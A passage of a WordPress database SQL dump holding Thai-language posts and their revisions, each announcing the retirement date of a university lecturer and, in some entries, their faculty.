(327, 1, '2019-05-26 15:16:51', '2019-05-26 08:16:51', 'อาจารย์ราตรี  ศรีสุวรรณ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'อาจารย์ราตรี  ศรีสุวรรณ', '', 'inherit', 'closed', 'closed', '', '326-revision-v1', '', '', '2019-05-26 15:16:51', '2019-05-26 08:16:51', '', 326, 'http://172.17.40.11/wp511/?p=327', 0, 'revision', '', 0),
(328, 1, '2019-05-26 15:17:03', '2019-05-26 08:17:03', 'ผู้ช่วยศาสตราจารย์วารุณี  วงศ์วิเชียร\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์วารุณี  วงศ์วิเชียร', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%b8', '', '', '2019-05-26 15:17:03', '2019-05-26 08:17:03', '', 0, 'http://172.17.40.11/wp511/?p=328', 0, 'post', '', 0),
(329, 1, '2019-05-26 15:17:03', '2019-05-26 08:17:03', 'ผู้ช่วยศาสตราจารย์วารุณี  วงศ์วิเชียร\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์วารุณี  วงศ์วิเชียร', '', 'inherit', 'closed', 'closed', '', '328-revision-v1', '', '', '2019-05-26 15:17:03', '2019-05-26 08:17:03', '', 328, 'http://172.17.40.11/wp511/?p=329', 0, 'revision', '', 0),
(330, 1, '2019-05-26 15:17:20', '2019-05-26 08:17:20', 'อาจารย์ศักดิ์ดา  บุญจุน\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'อาจารย์ศักดิ์ดา  บุญจุน', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a8%e0%b8%b1%e0%b8%81%e0%b8%94%e0%b8%b4%e0%b9%8c%e0%b8%94%e0%b8%b2-%e0%b8%9a%e0%b8%b8%e0%b8%8d%e0%b8%88%e0%b8%b8%e0%b8%99', '', '', '2019-05-26 15:17:20', '2019-05-26 08:17:20', '', 0, 'http://172.17.40.11/wp511/?p=330', 0, 'post', '', 0),
(331, 1, '2019-05-26 15:17:20', '2019-05-26 08:17:20', 'อาจารย์ศักดิ์ดา  บุญจุน\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'อาจารย์ศักดิ์ดา  บุญจุน', '', 'inherit', 'closed', 'closed', '', '330-revision-v1', '', '', '2019-05-26 15:17:20', '2019-05-26 08:17:20', '', 330, 'http://172.17.40.11/wp511/?p=331', 0, 'revision', '', 0),
(332, 1, '2019-05-26 15:17:33', '2019-05-26 08:17:33', 'ดร.สัมภาษณ์  แก้วอาภรณ์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ดร.สัมภาษณ์  แก้วอาภรณ์', '', 'publish', 'closed', 'open', '', '%e0%b8%94%e0%b8%a3-%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%a0%e0%b8%b2%e0%b8%a9%e0%b8%93%e0%b9%8c-%e0%b9%81%e0%b8%81%e0%b9%89%e0%b8%a7%e0%b8%ad%e0%b8%b2%e0%b8%a0%e0%b8%a3%e0%b8%93%e0%b9%8c', '', '', '2019-05-26 15:17:33', '2019-05-26 08:17:33', '', 0, 'http://172.17.40.11/wp511/?p=332', 0, 'post', '', 0),
(333, 1, '2019-05-26 15:17:33', '2019-05-26 08:17:33', 'ดร.สัมภาษณ์  แก้วอาภรณ์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ดร.สัมภาษณ์  แก้วอาภรณ์', '', 'inherit', 'closed', 'closed', '', '332-revision-v1', '', '', '2019-05-26 15:17:33', '2019-05-26 08:17:33', '', 332, 'http://172.17.40.11/wp511/?p=333', 0, 'revision', '', 0),
(334, 1, '2019-05-26 15:17:47', '2019-05-26 08:17:47', 'ผู้ช่วยศาสตราจารย์สุชา  ไอยราพงศ์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์สุชา  ไอยราพงศ์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b8%8a%e0%b8%b2', '', '', '2019-05-26 15:17:47', '2019-05-26 08:17:47', '', 0, 'http://172.17.40.11/wp511/?p=334', 0, 'post', '', 0),
(335, 1, '2019-05-26 15:17:47', '2019-05-26 08:17:47', 'ผู้ช่วยศาสตราจารย์สุชา  ไอยราพงศ์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์สุชา  ไอยราพงศ์', '', 'inherit', 'closed', 'closed', '', '334-revision-v1', '', '', '2019-05-26 15:17:47', '2019-05-26 08:17:47', '', 334, 'http://172.17.40.11/wp511/?p=335', 0, 'revision', '', 0),
(336, 1, '2019-05-26 15:17:59', '2019-05-26 08:17:59', 'อาจารย์เสริมศรี  ฤทธิ์ธาภิรมย์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'อาจารย์เสริมศรี  ฤทธิ์ธาภิรมย์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%aa%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%a8%e0%b8%a3%e0%b8%b5-%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c%e0%b8%98', '', '', '2019-05-26 15:17:59', '2019-05-26 08:17:59', '', 0, 'http://172.17.40.11/wp511/?p=336', 0, 'post', '', 0),
(337, 1, '2019-05-26 15:17:59', '2019-05-26 08:17:59', 'อาจารย์เสริมศรี  ฤทธิ์ธาภิรมย์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'อาจารย์เสริมศรี  ฤทธิ์ธาภิรมย์', '', 'inherit', 'closed', 'closed', '', '336-revision-v1', '', '', '2019-05-26 15:17:59', '2019-05-26 08:17:59', '', 336, 'http://172.17.40.11/wp511/?p=337', 0, 'revision', '', 0),
(338, 1, '2019-05-26 15:18:13', '2019-05-26 08:18:13', 'ผู้ช่วยศาสตราจารย์เสาวนีย์  จันทร์เจิดศักดิ์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์เสาวนีย์  จันทร์เจิดศักดิ์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%aa%e0%b8%b2%e0%b8%a7-2', '', '', '2019-05-26 15:18:13', '2019-05-26 08:18:13', '', 0, 'http://172.17.40.11/wp511/?p=338', 0, 'post', '', 0),
(339, 1, '2019-05-26 15:18:13', '2019-05-26 08:18:13', 'ผู้ช่วยศาสตราจารย์เสาวนีย์  จันทร์เจิดศักดิ์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์เสาวนีย์  จันทร์เจิดศักดิ์', '', 'inherit', 'closed', 'closed', '', '338-revision-v1', '', '', '2019-05-26 15:18:13', '2019-05-26 08:18:13', '', 338, 'http://172.17.40.11/wp511/?p=339', 0, 'revision', '', 0),
(340, 1, '2019-05-26 15:18:33', '2019-05-26 08:18:33', 'ผู้ช่วยศาสตราจารย์อรุณรัตน์  ดวงสร้อยทอง\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์อรุณรัตน์  ดวงสร้อยทอง', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%ad%e0%b8%a3%e0%b8%b8%e0%b8%93-3', '', '', '2019-05-26 15:18:33', '2019-05-26 08:18:33', '', 0, 'http://172.17.40.11/wp511/?p=340', 0, 'post', '', 0),
(341, 1, '2019-05-26 15:18:33', '2019-05-26 08:18:33', 'ผู้ช่วยศาสตราจารย์อรุณรัตน์  ดวงสร้อยทอง\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์อรุณรัตน์  ดวงสร้อยทอง', '', 'inherit', 'closed', 'closed', '', '340-revision-v1', '', '', '2019-05-26 15:18:33', '2019-05-26 08:18:33', '', 340, 'http://172.17.40.11/wp511/?p=341', 0, 'revision', '', 0),
(342, 1, '2019-05-26 15:18:48', '2019-05-26 08:18:48', 'ผู้ช่วยศาสตราจารย์จำรัส  คงเรือง\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์จำรัส  คงเรือง', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%88%e0%b8%b3%e0%b8%a3%e0%b8%b1', '', '', '2019-05-26 15:18:48', '2019-05-26 08:18:48', '', 0, 'http://172.17.40.11/wp511/?p=342', 0, 'post', '', 0),
(343, 1, '2019-05-26 15:18:48', '2019-05-26 08:18:48', 'ผู้ช่วยศาสตราจารย์จำรัส  คงเรือง\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์จำรัส  คงเรือง', '', 'inherit', 'closed', 'closed', '', '342-revision-v1', '', '', '2019-05-26 15:18:48', '2019-05-26 08:18:48', '', 342, 'http://172.17.40.11/wp511/?p=343', 0, 'revision', '', 0),
(344, 1, '2019-05-26 15:19:00', '2019-05-26 08:19:00', 'ผู้ช่วยศาสตราจารย์จำแลง  แสงจันทร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์จำแลง  แสงจันทร์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%88%e0%b8%b3%e0%b9%81%e0%b8%a5', '', '', '2019-05-26 15:19:01', '2019-05-26 08:19:01', '', 0, 'http://172.17.40.11/wp511/?p=344', 0, 'post', '', 0),
(345, 1, '2019-05-26 15:19:01', '2019-05-26 08:19:01', 'ผู้ช่วยศาสตราจารย์จำแลง  แสงจันทร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์จำแลง  แสงจันทร์', '', 'inherit', 'closed', 'closed', '', '344-revision-v1', '', '', '2019-05-26 15:19:01', '2019-05-26 08:19:01', '', 344, 'http://172.17.40.11/wp511/?p=345', 0, 'revision', '', 0),
(346, 1, '2019-05-26 15:19:12', '2019-05-26 08:19:12', 'ผู้ช่วยศาสตราจารย์ภิญโญ  ช่างสาน\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์ภิญโญ  ช่างสาน', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a0%e0%b8%b4%e0%b8%8d%e0%b9%82', '', '', '2019-05-26 15:19:12', '2019-05-26 08:19:12', '', 0, 'http://172.17.40.11/wp511/?p=346', 0, 'post', '', 0),
(347, 1, '2019-05-26 15:19:12', '2019-05-26 08:19:12', 'ผู้ช่วยศาสตราจารย์ภิญโญ  ช่างสาน\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์ภิญโญ  ช่างสาน', '', 'inherit', 'closed', 'closed', '', '346-revision-v1', '', '', '2019-05-26 15:19:12', '2019-05-26 08:19:12', '', 346, 'http://172.17.40.11/wp511/?p=347', 0, 'revision', '', 0),
(348, 1, '2019-05-26 15:19:23', '2019-05-26 08:19:23', 'ผู้ช่วยศาสตราจารย์ ดร.ยินดี  สวนะคุณานนท์\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์ ดร.ยินดี  สวนะคุณานนท์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c-%e0%b8%94%e0%b8%a3-%e0%b8%a2%e0%b8%b4', '', '', '2019-05-26 15:19:23', '2019-05-26 08:19:23', '', 0, 'http://172.17.40.11/wp511/?p=348', 0, 'post', '', 0),
(349, 1, '2019-05-26 15:19:23', '2019-05-26 08:19:23', 'ผู้ช่วยศาสตราจารย์ ดร.ยินดี  สวนะคุณานนท์\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์ ดร.ยินดี  สวนะคุณานนท์', '', 'inherit', 'closed', 'closed', '', '348-revision-v1', '', '', '2019-05-26 15:19:23', '2019-05-26 08:19:23', '', 348, 'http://172.17.40.11/wp511/?p=349', 0, 'revision', '', 0),
(350, 1, '2019-05-26 15:19:35', '2019-05-26 08:19:35', 'ผู้ช่วยศาสตราจารย์ลลิตา  โชติรังสิยากุล\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์ลลิตา  โชติรังสิยากุล', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a5%e0%b8%a5%e0%b8%b4%e0%b8%95', '', '', '2019-05-26 15:19:35', '2019-05-26 08:19:35', '', 0, 'http://172.17.40.11/wp511/?p=350', 0, 'post', '', 0),
(351, 1, '2019-05-26 15:19:35', '2019-05-26 08:19:35', 'ผู้ช่วยศาสตราจารย์ลลิตา  โชติรังสิยากุล\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์ลลิตา  โชติรังสิยากุล', '', 'inherit', 'closed', 'closed', '', '350-revision-v1', '', '', '2019-05-26 15:19:35', '2019-05-26 08:19:35', '', 350, 'http://172.17.40.11/wp511/?p=351', 0, 'revision', '', 0),
(352, 1, '2019-05-26 15:19:52', '2019-05-26 08:19:52', 'ผู้ช่วยศาสตราจารย์วันเพ็ญ  อินทรอักษร\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์วันเพ็ญ  อินทรอักษร', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%80-2', '', '', '2019-05-26 15:19:52', '2019-05-26 08:19:52', '', 0, 'http://172.17.40.11/wp511/?p=352', 0, 'post', '', 0),
(353, 1, '2019-05-26 15:19:52', '2019-05-26 08:19:52', 'ผู้ช่วยศาสตราจารย์วันเพ็ญ  อินทรอักษร\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์วันเพ็ญ  อินทรอักษร', '', 'inherit', 'closed', 'closed', '', '352-revision-v1', '', '', '2019-05-26 15:19:52', '2019-05-26 08:19:52', '', 352, 'http://172.17.40.11/wp511/?p=353', 0, 'revision', '', 0),
(354, 1, '2019-05-26 15:20:04', '2019-05-26 08:20:04', 'อาจารย์วิโรจน์  วัฒนาวิวัส\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'อาจารย์วิโรจน์  วัฒนาวิวัส', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%b4%e0%b9%82%e0%b8%a3%e0%b8%88%e0%b8%99%e0%b9%8c-%e0%b8%a7%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%a7%e0%b8%b4', '', '', '2019-05-26 15:20:04', '2019-05-26 08:20:04', '', 0, 'http://172.17.40.11/wp511/?p=354', 0, 'post', '', 0),
(355, 1, '2019-05-26 15:20:04', '2019-05-26 08:20:04', 'อาจารย์วิโรจน์  วัฒนาวิวัส\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'อาจารย์วิโรจน์  วัฒนาวิวัส', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2019-05-26 15:20:04', '2019-05-26 08:20:04', '', 354, 'http://172.17.40.11/wp511/?p=355', 0, 'revision', '', 0),
(356, 1, '2019-05-26 15:20:17', '2019-05-26 08:20:17', 'ผู้ช่วยศาสตราจารย์สมบูรณ์  คงกับพันธ์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์สมบูรณ์  คงกับพันธ์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%a1%e0%b8%9a%e0%b8%b9-2', '', '', '2019-05-26 15:20:17', '2019-05-26 08:20:17', '', 0, 'http://172.17.40.11/wp511/?p=356', 0, 'post', '', 0),
(357, 1, '2019-05-26 15:20:17', '2019-05-26 08:20:17', 'ผู้ช่วยศาสตราจารย์สมบูรณ์  คงกับพันธ์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์สมบูรณ์  คงกับพันธ์', '', 'inherit', 'closed', 'closed', '', '356-revision-v1', '', '', '2019-05-26 15:20:17', '2019-05-26 08:20:17', '', 356, 'http://172.17.40.11/wp511/?p=357', 0, 'revision', '', 0),
(358, 1, '2019-05-26 15:20:34', '2019-05-26 08:20:34', 'รองศาสตราจารย์สว่างจิต  พงศ์ศรีวัฒน์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'รองศาสตราจารย์สว่างจิต  พงศ์ศรีวัฒน์', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%a7%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%88%e0%b8%b4%e0%b8%95', '', '', '2019-05-26 15:20:34', '2019-05-26 08:20:34', '', 0, 'http://172.17.40.11/wp511/?p=358', 0, 'post', '', 0),
(359, 1, '2019-05-26 15:20:34', '2019-05-26 08:20:34', 'รองศาสตราจารย์สว่างจิต  พงศ์ศรีวัฒน์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'รองศาสตราจารย์สว่างจิต  พงศ์ศรีวัฒน์', '', 'inherit', 'closed', 'closed', '', '358-revision-v1', '', '', '2019-05-26 15:20:34', '2019-05-26 08:20:34', '', 358, 'http://172.17.40.11/wp511/?p=359', 0, 'revision', '', 0),
(360, 1, '2019-05-26 15:20:49', '2019-05-26 08:20:49', 'ผู้ช่วยศาสตราจารย์สุจิตรา  เทพไสย\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์สุจิตรา  เทพไสย', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b8%88%e0%b8%b4', '', '', '2019-05-26 15:20:49', '2019-05-26 08:20:49', '', 0, 'http://172.17.40.11/wp511/?p=360', 0, 'post', '', 0),
(361, 1, '2019-05-26 15:20:49', '2019-05-26 08:20:49', 'ผู้ช่วยศาสตราจารย์สุจิตรา  เทพไสย\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์สุจิตรา  เทพไสย', '', 'inherit', 'closed', 'closed', '', '360-revision-v1', '', '', '2019-05-26 15:20:49', '2019-05-26 08:20:49', '', 360, 'http://172.17.40.11/wp511/?p=361', 0, 'revision', '', 0),
(362, 1, '2019-05-26 15:21:02', '2019-05-26 08:21:02', 'อาจารย์อารีย์  วากะมะ\r\n\r\nเกษียณอายุราชการ   วันที่ 30 กันยายน 2551', 'อาจารย์อารีย์  วากะมะ', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%ad%e0%b8%b2%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b9%8c-%e0%b8%a7%e0%b8%b2%e0%b8%81%e0%b8%b0%e0%b8%a1%e0%b8%b0', '', '', '2019-05-26 15:21:02', '2019-05-26 08:21:02', '', 0, 'http://172.17.40.11/wp511/?p=362', 0, 'post', '', 0),
(363, 1, '2019-05-26 15:21:02', '2019-05-26 08:21:02', 'อาจารย์อารีย์  วากะมะ\r\n\r\nเกษียณอายุราชการ   วันที่ 30 กันยายน 2551', 'อาจารย์อารีย์  วากะมะ', '', 'inherit', 'closed', 'closed', '', '362-revision-v1', '', '', '2019-05-26 15:21:02', '2019-05-26 08:21:02', '', 362, 'http://172.17.40.11/wp511/?p=363', 0, 'revision', '', 0),
(364, 1, '2019-05-26 15:21:17', '2019-05-26 08:21:17', 'ผู้ช่วยศาสตราจารย์วิชัย  บุญชูดวง\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์วิชัย  บุญชูดวง', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b1', '', '', '2019-05-26 15:21:17', '2019-05-26 08:21:17', '', 0, 'http://172.17.40.11/wp511/?p=364', 0, 'post', '', 0),
(365, 1, '2019-05-26 15:21:17', '2019-05-26 08:21:17', 'ผู้ช่วยศาสตราจารย์วิชัย  บุญชูดวง\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'ผู้ช่วยศาสตราจารย์วิชัย  บุญชูดวง', '', 'inherit', 'closed', 'closed', '', '364-revision-v1', '', '', '2019-05-26 15:21:17', '2019-05-26 08:21:17', '', 364, 'http://172.17.40.11/wp511/?p=365', 0, 'revision', '', 0),
(366, 1, '2019-05-26 15:21:30', '2019-05-26 08:21:30', 'อาจารย์สุมา  ทิพย์ธารา\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'อาจารย์สุมา  ทิพย์ธารา', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b8%a1%e0%b8%b2-%e0%b8%97%e0%b8%b4%e0%b8%9e%e0%b8%a2%e0%b9%8c%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%b2', '', '', '2019-05-26 15:21:30', '2019-05-26 08:21:30', '', 0, 'http://172.17.40.11/wp511/?p=366', 0, 'post', '', 0),
(367, 1, '2019-05-26 15:21:30', '2019-05-26 08:21:30', 'อาจารย์สุมา  ทิพย์ธารา\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2551', 'อาจารย์สุมา  ทิพย์ธารา', '', 'inherit', 'closed', 'closed', '', '366-revision-v1', '', '', '2019-05-26 15:21:30', '2019-05-26 08:21:30', '', 366, 'http://172.17.40.11/wp511/?p=367', 0, 'revision', '', 0),
(368, 1, '2019-05-26 15:21:43', '2019-05-26 08:21:43', 'อาจารย์จรูญ  ศรียะพันธุ์\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'อาจารย์จรูญ  ศรียะพันธุ์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%88%e0%b8%a3%e0%b8%b9%e0%b8%8d-%e0%b8%a8%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%b0%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b8%b8', '', '', '2019-05-26 15:21:43', '2019-05-26 08:21:43', '', 0, 'http://172.17.40.11/wp511/?p=368', 0, 'post', '', 0),
(369, 1, '2019-05-26 15:21:43', '2019-05-26 08:21:43', 'อาจารย์จรูญ  ศรียะพันธุ์\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2552', 'อาจารย์จรูญ  ศรียะพันธุ์', '', 'inherit', 'closed', 'closed', '', '368-revision-v1', '', '', '2019-05-26 15:21:43', '2019-05-26 08:21:43', '', 368, 'http://172.17.40.11/wp511/?p=369', 0, 'revision', '', 0),
